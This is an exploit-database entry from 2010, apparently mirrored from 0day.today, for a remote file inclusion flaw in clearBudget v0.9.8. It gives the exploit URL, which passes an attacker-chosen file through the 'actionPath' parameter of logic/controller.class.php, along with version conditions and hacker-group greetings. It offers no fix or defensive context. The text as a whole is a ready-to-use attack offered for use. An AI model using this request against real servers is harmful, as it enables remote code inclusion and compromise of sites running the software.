id: 13650
date: 08/10/2010
title: clearBudget v0.9.8 RFI Vulnerability
author: Offensive
cves: 

====================================
clearBudget v0.9.8 RFI Vulnerability
====================================

# Exploit Title: clearBudget v0.9.8 Remote File Include
# Author: Offensive [Offsensive@live.com] ~ Red-Stone On Community !
# Software Link: [ http://www.clearbudget.net ]
# Version : v0.9.8
# Tested on: Windows XP
 
C0nditi0ns : PHP Version > 4.x.x
Expl0it Code : http://target/clearBudget.0.9.8/logic/controller.class.php?actionPath=[file]
 
Ramadan Kareem !
Gr33t'z : SA-h4x0r ~ LoOoRd ~ Inj3ct0r M3ms (Inj3ct0r.com)& T3am   



#  0day.today [2023-03-21]  #